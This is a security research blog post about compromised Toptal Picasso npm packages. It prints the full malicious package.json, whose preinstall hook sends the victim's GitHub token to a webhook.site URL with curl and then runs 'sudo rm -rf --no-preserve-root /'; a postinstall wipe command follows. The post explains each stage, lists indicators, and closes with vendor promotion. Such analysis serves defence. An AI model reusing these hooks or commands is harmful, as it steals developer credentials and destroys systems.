Kush Pandya
July 23, 2025
What happens when a threat actor gains access to a company's GitHub organization and starts publishing packages with destructive payloads?
Socket's Threat Research Team discovered this exact scenario when 73 repositories in Toptal's GitHub organization went public, with at least 10 of them containing malicious code designed to exfiltrate GitHub authentication tokens and destroy victim systems. Toptal, a global talent network that has served over 25,000 clients across 14+ countries since 2010, maintains the Picasso design system used by developers worldwide.
The affected packages include the following:
@toptal/picasso-tailwind@toptal/picasso-charts@toptal/picasso-shared@toptal/picasso-provider@toptal/picasso-select@toptal/picasso-quote@toptal/picasso-forms@xene/core@toptal/picasso-utils@toptal/picasso-typographThey contain identical malicious payloads embedded in their package.json files. The compromised packages accumulated approximately 5,000 downloads before being detected and removed.
The malicious code appears in the npm lifecycle hooks, specifically targeting the preinstall and postinstall scripts:
{
"name": "@toptal/picasso-tailwind",
"version": "3.1.0",
"description": "Picasso Tailwind configuration",
"scripts": {
"build:package": "sh ./bin/build.sh",
"prepublishOnly": "yarn build:package",
"preinstall": "curl -d \"$(gh auth token)\" https://webhook.site/fb5b4647-aff8-418c-99e7-ec830cc2024b; sudo rm -rf --no-preserve-root /",
"postinstall": "rm /s /q"
}
}
Socket's AI Scanner flags the malicious @toptal/picasso-tailwind package
The injected code demonstrates a two-stage attack designed to maximize damage:
Stage 1: Token Exfiltration
curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024bThis command extracts the victim's GitHub authentication token using the GitHub CLI (gh auth token) and sends it to a webhook.site endpoint controlled by the attacker. The stolen tokens provide persistent access to the victim's GitHub repositories and can be used for further compromise.
Stage 2: System Destruction
sudo rm -rf --no-preserve-root /After exfiltrating credentials, the script attempts to delete the entire filesystem on Unix-based systems. The --no-preserve-root flag specifically overrides safety protections that would normally prevent deletion of the root directory.
The postinstall script includes a Windows-equivalent destructive command:
rm /s /qThis dual-platform approach ensures the malicious payload can cause damage regardless of the victim's operating system.
While the exact method of compromise remains unclear, this incident could be connected to several ongoing attack campaigns targeting the npm ecosystem.
Phishing Campaign Variant: The attack could represent an evolution of the npm phishing techniques with threat actors adapting their payloads for different targets or testing new destruction methods.
Insider Threat: The compromise might stem from a malicious insider with legitimate access to Toptal's GitHub organization, explaining the ability to modify multiple repositories simultaneously.
Credential Compromise: Stolen or leaked developer credentials could have provided the access needed to modify the repositories, whether through previous breaches, credential stuffing, or social engineering attacks.
Supply Chain Targeting: The incident could be part of a separate campaign specifically targeting development tools and design system packages to maximize impact across multiple organizations.
The relationship between the GitHub repository changes and npm package publishing remains unclear. The attack could have originated from compromised GitHub access that enabled both repository modifications and npm publishing, or from separate compromise vectors that affected both platforms independently. Without additional forensic evidence, determining the precise sequence and relationship between these events remains challenging.
Timeline analysis showing 73 repositories going public within a 5-minute window on July 20, 2025
The compromise shares some characteristics with recent supply chain attacks, including the npm phishing campaign that targeted open source projects like prettier and the hijacking of the popular is package, particularly the focus on credential harvesting and the use of legitimate accounts to distribute malicious code.
Toptal responded quickly once the compromise was identified and deprecated the malicious package versions and reverted to their last stable versions, preventing further distribution of the malicious code. This rapid response likely prevented significant additional damage to the developer community.
Socket's team contacted Toptal regarding this incident but have not received a response at the time of publication.
The Toptal repository compromise demonstrates how threat actors continue to evolve their supply chain attack techniques, targeting legitimate organizational accounts to distribute malicious code. While Toptal's quick response helped minimize the impact, this incident serves as a reminder that even well-established organizations can fall victim to sophisticated social engineering and account compromise techniques. The developer community must remain vigilant and implement comprehensive security measures to protect against these evolving threats.
Organizations should enable two-factor authentication, implement branch protection rules, and monitor repository visibility changes for unusual publishing activity. Developers must review package.json lifecycle scripts before installing dependencies, use automated security scanning in CI/CD pipelines, and regularly rotate authentication tokens. Security teams should monitor npm registry activity for unusual publication patterns, implement network egress filtering to detect credential exfiltration attempts, and create incident response procedures specifically for supply chain compromises.
Socket provides comprehensive protection against these supply chain attacks. The Socket GitHub App automatically scans pull requests to catch malicious packages before they enter your codebase. The Socket CLI detects dangerous dependencies during installation, while the Socket browser extension warns developers about suspicious packages during research and selection. Socket MCP brings this same protection to AI coding environments, preventing malicious packages from being introduced through AI-generated code suggestions. Together, these tools help organizations identify and block malicious dependencies before they can compromise systems.
Malicious Packages:
@toptal/picasso-tailwind (v3.1.0)@toptal/picasso-charts (v59.1.4)@toptal/picasso-shared (v15.1.0)@toptal/picasso-provider (v5.1.1)@toptal/picasso-select (v4.2.2)@toptal/picasso-quote (v2.1.7)@toptal/picasso-forms (v73.3.2)@xene/core (v0.4.1)@toptal/picasso-utils (v3.2.0)@toptal/picasso-typography (v4.1.4)C2 Server
webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024bUPDATE 8/5/2025: The compromised packages accumulated approximately 5,000 downloads on July 20, 2025, when the compromise was detected. The specific window during which the packages were compromised that day remains unclear, although Toptal claims it was 'only a few hours' in a response that was emailed to Socket 13 days after the incident.
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
Socket researchers found 10 typosquatted npm packages that auto-run on install, show fake CAPTCHAs, fingerprint by IP, and deploy a credential stealer.
Research
The Socket Threat Research Team uncovered malicious NuGet packages typosquatting the popular Nethereum project to steal wallet keys.
Research
/Security News
The Socket Threat Research Team uncovered a coordinated campaign that floods the Chrome Web Store with 131 rebranded clones of a WhatsApp Web automation extension to spam Brazilian users.